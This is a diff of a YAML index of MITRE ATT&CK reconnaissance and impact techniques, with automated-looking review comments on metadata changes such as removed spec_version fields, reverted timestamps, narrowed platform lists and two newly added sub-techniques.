+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -67736,6 +68416,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -67758,6 +68442,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -67765,9 +68453,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
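Review bot: the removal of `spec_version: '2.1'` here is the first of a series that repeats for every technique block in this diff; if that is deliberate (the field is STIX-level and the generator now omits it), say so in the PR description, and confirm that nothing downstream parses these `technique:` maps as STIX 2.1 objects, where `spec_version` is a required property. The companion bump `x_mitre_attack_spec_version: 3.1.0` to `3.2.0` is fine on its own.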
@@ -67826,7 +68513,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
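Review bot: `modified` moves backwards here (`'2022-05-24T14:00:00.188Z'` to `'2022-04-15T19:10:23.838Z'`) with no other change to T1595.003, and the same regression appears later for T1591.004, T1596.005, T1591.001, T1598.001, T1491.002, T1499.001 and T1561. The old values all share the `14:00:00.188Z` suffix, so this reads as a resync to the upstream STIX timestamps rather than an edit; please state the source bundle and its version in the PR description, and if any tooling uses `modified` to decide whether an object is stale, check that a later regeneration does not flip these back.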
@@ -67846,7 +68533,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
@@ -67868,7 +68554,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -67884,12 +68570,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
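Review bot: T1591.004 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` and ends up with no spec-version marker at all, whereas other objects in this diff keep `x_mitre_attack_spec_version` (bumped to 3.2.0). The same pattern hits T1596.005, T1591.001, T1598.001 and T1491.002 further down. If that mirrors the upstream objects, fine, but make sure every reader of this file treats the key as optional rather than failing on its absence, and mention the asymmetry in the commit message.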
@@ -67958,7 +68642,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -68006,31 +68690,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -68039,19 +68704,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
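Review bot: the substantive changes to T1595.001 are buried under a wholesale key reorder (the fields removed in the previous hunk are re-added here in a different order). What actually changed: `x_mitre_contributors` gains `Diego Sappa, Securonix`, `x_mitre_version` goes `'1.0'` to `'1.1'`, `x_mitre_data_sources` gains `'Network Traffic: Network Traffic Content'`, and `revoked: false` plus `x_mitre_deprecated: false` are new. Please list these in the PR description, and have the generator emit keys in a fixed order so future regenerations show only real diffs.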
@@ -68109,7 +68796,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -68130,7 +68816,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -68146,8 +68832,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -68173,7 +68857,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -68189,8 +68873,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -68214,7 +68896,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -68236,13 +68918,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -68334,13 +69014,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -68349,7 +69028,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -68366,17 +69044,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
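Review bot: this hunk narrows the scope of T1498.001 by dropping `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` from `x_mitre_platforms` (with the matching `x_mitre_version` bump `'1.3'` to `'1.4'`), leaving Windows, IaaS, Linux and macOS. That is a content change, not a reformat: any per-platform index derived from this file must be regenerated in the same change so the technique stops appearing under the removed platforms, and the PR description should call it out.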
@@ -68401,7 +69074,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -68439,7 +69113,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -68473,12 +69147,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -68543,42 +69215,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
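Review bot: two new sub-techniques, T1485.001 (Lifecycle-Triggered Deletion) and T1496.003 (SMS Pumping), are inserted ahead of T1499.003 under `impact:`, so the diff presents T1499.003 as rewritten into T1485.001 and then re-created, hiding the fact that the new entries are pure additions. Emitting technique IDs in sorted order (or appending new ones) would make this reviewable. Both new entries arrive with `x_mitre_detection: ''` and `atomic_tests: []`; the only data source listed is `'Cloud Storage: Cloud Storage Modification'` for T1485.001 and `'Application Log: Application Log Content'` for T1496.003, so the missing detection guidance is worth tracking in a follow-up issue.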
@@ -68589,13 +69346,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
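Review bot: T1499.003 gets the same platform narrowing as T1498.001: the old list removed in the previous hunk included `Azure AD`, `Office 365`, `SaaS` and `Google Workspace`, and the re-added `x_mitre_platforms` keeps only Windows, IaaS, Linux and macOS, with `x_mitre_version` `'1.2'` to `'1.3'`. Treat it as a content change: regenerate any platform-filtered views in this PR and mention it in the description.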
@@ -68603,12 +69367,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -68669,109 +69454,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
